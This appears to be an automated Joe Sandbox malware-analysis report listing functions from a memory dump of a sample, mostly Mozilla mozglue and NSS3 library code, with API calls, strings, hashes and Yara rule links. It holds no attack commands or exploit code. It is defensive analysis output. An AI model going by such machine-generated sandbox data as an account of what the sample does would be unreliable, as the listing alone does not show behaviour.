                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C792E2D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __acrt_iob_func
                                                                                                                                                                                                                                                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                        • API String ID: 711238415-4149320968
                                                                                                                                                                                                                                                                                        • Opcode ID: 197d957731c44988eba029a50ec1a19a733a693e0fe3dc59567c64e579d6062c
                                                                                                                                                                                                                                                                                        • Instruction ID: a7772f453f908a0caaf3366bfb4d0feb546e8425cde991da6980d065274a9343
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 197d957731c44988eba029a50ec1a19a733a693e0fe3dc59567c64e579d6062c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B151E1B06083818FC724DF24E68959FF7E1AFC9358F10492DE59A97760EB30D949CB46
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C76D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D4F2
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D50B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74CFE0: EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C74CFE0: LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D52E
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D690
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C77D1C5), ref: 6C76D751
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                                                                                                                                                                                                        • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                                                        • API String ID: 3805649505-2608361144
                                                                                                                                                                                                                                                                                        • Opcode ID: b0331040749ccbc3b540d9d71a8891d954bf293b42dc0e340f5d3b3a3f0125c3
                                                                                                                                                                                                                                                                                        • Instruction ID: 302274b390d3ad9aad69dae23807a82f7a4f3ef4c1c8448bfc59ed66dc67e488
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0331040749ccbc3b540d9d71a8891d954bf293b42dc0e340f5d3b3a3f0125c3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01512371A047468FD724CF29C29871AB7E1EB99704F24493EE999C7F85D730E800CB96
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C79B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C744290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C783EBD,6C783EBD,00000000), ref: 6C7442A9
                                                                                                                                                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C79B127), ref: 6C79B463
                                                                                                                                                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C79B4C9
                                                                                                                                                                                                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C79B4E4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _getpidstrlenstrncmptolower
                                                                                                                                                                                                                                                                                        • String ID: pid:
                                                                                                                                                                                                                                                                                        • API String ID: 1720406129-3403741246
                                                                                                                                                                                                                                                                                        • Opcode ID: 0d29203872ba66409156e34af5f7811c1195a4180301b5459257b632e90cd3a5
                                                                                                                                                                                                                                                                                        • Instruction ID: 04e3b50dc91a140a0025ffb491f8e890b191c01348d9e5e0c3fb1a6fb38db4a5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d29203872ba66409156e34af5f7811c1195a4180301b5459257b632e90cd3a5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C313331A012098FCB20CFA9EA84AEEB7B5FF44308F540539D8216BA41D731F984DBE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C7F6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C7F6D36
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • database corruption, xrefs: 6C7F6D2A
                                                                                                                                                                                                                                                                                        • %s at line %d of [%.10s], xrefs: 6C7F6D2F
                                                                                                                                                                                                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7F6D20
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                        • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                                                        • Opcode ID: dace25aeb660bd8a089ffd9241d8d0423018966dce077f15ad380ca3a3b9ef67
                                                                                                                                                                                                                                                                                        • Instruction ID: b4827fe5f20741db8c9378fb4e1ed1e09d3f9a9c542ec4750cbb4f3c60d88b6b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dace25aeb660bd8a089ffd9241d8d0423018966dce077f15ad380ca3a3b9ef67
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D82148316043059BCB10CF19CA86B5AB7F2AF84318F14852CD8699BF51E371FA46C7A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C92CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C92CC7B), ref: 6C92CD7A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C92CD8E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C92CDA5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C92CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C92CDB8
                                                                                                                                                                                                                                                                                        • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C92CCB5
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(6C9C14F4,6C9C02AC,00000090), ref: 6C92CCD3
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(6C9C1588,6C9C02AC,00000090), ref: 6C92CD2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C849AC0: socket.WSOCK32(?,00000017,6C8499BE), ref: 6C849AE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C849AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C8499BE), ref: 6C849AFC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C850590: closesocket.WSOCK32(6C849A8F,?,?,6C849A8F,00000000), ref: 6C850597
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                                                                                        • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                                                                                        • API String ID: 1231378898-412307543
                                                                                                                                                                                                                                                                                        • Opcode ID: beb9e600f5da3143b516f863504ff3b5c76931a5eb98e7be77d7695756dbd1ab
                                                                                                                                                                                                                                                                                        • Instruction ID: 2f2e74e7220434e76b3d0cd776068e1e65996e6f0f13ab6b2a38c0070ec0c488
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: beb9e600f5da3143b516f863504ff3b5c76931a5eb98e7be77d7695756dbd1ab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 621184F1B193809EEB209F69CD06B823BA8E757618F241429E405CBB41E775C6148BEB
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C78E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78E577
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E584
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E5DE
                                                                                                                                                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C78E8A6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
                                                                                                                                                                                                                                                                                        • API String ID: 1483687287-1611356987
                                                                                                                                                                                                                                                                                        • Opcode ID: fd015b127a6314fe77a7e25d475c4d5eb350be6d717029b1469feddb5da93d9b
                                                                                                                                                                                                                                                                                        • Instruction ID: 13070c1e85dfaf123b12a9dd824c2cedfff2b5e880775997ea92699dfb82b23b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd015b127a6314fe77a7e25d475c4d5eb350be6d717029b1469feddb5da93d9b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B011ED32B0024ADFCB009F15C948A6ABBB8FB89728F400639F86147A50C774AA44CBD2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C790C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C790CD5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,6C755407), ref: 6C77F9A7
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C790D40
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C790DCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C790DDD
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C790DF2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 409b67564343a759f49d296b5f3757288a3e327bcf45a5d3d4073fa6946b2988
                                                                                                                                                                                                                                                                                        • Instruction ID: de5b14313100e7f9a0ec599ed895281aa45d86eb45484d04cf49958e0720143a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409b67564343a759f49d296b5f3757288a3e327bcf45a5d3d4073fa6946b2988
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA415B719187848BD720CF29D28579EFBE5BFC9714F108A2EE8D887751D7709844CB82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C79CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CDA4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C79CDBA,00100000,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D158
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79D130: InitializeConditionVariable.KERNEL32(00000098,?,6C79CDBA,00100000,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D177
                                                                                                                                                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CDC4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C797480: ReleaseSRWLockExclusive.KERNEL32(?,6C791385,?,?,?,?,6C791385,?), ref: 6C7974EB
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CECC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C78CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C79CEEA,?,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000), ref: 6C78CB57
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C78CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C78CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C79CEEA,?,?), ref: 6C78CBAF
                                                                                                                                                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D058
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a3860d130efe068fc27f9b141e3d6f9975ef66fd4d8e6038c36a1a2441173664
                                                                                                                                                                                                                                                                                        • Instruction ID: 8b8f2fb83b6544802a011e87c68400ba6f9f56559190af38d4fbcb6b53ed9b1b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3860d130efe068fc27f9b141e3d6f9975ef66fd4d8e6038c36a1a2441173664
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03D16D71A04B069FD708CF28D580B99F7E1BF99308F01866DD8598B752EB31A9A5CBC1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C765C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C765D40
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C765DB4
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C765DED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5cf43fbc30924883be0344df0f2b3b452271f13e2285c85498f47e829731be4c
                                                                                                                                                                                                                                                                                        • Instruction ID: dcbe55ccae321a77812ac6eb3c9b9d2d8f470011705fe640ef79fd9722c7008b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cf43fbc30924883be0344df0f2b3b452271f13e2285c85498f47e829731be4c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54516171E0011A8FDF08CF69C995ABEBBB1FB85304F19862DD855B7B91C7306A45CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C74CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74CEBD
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C74CEF5
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C74CF4E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
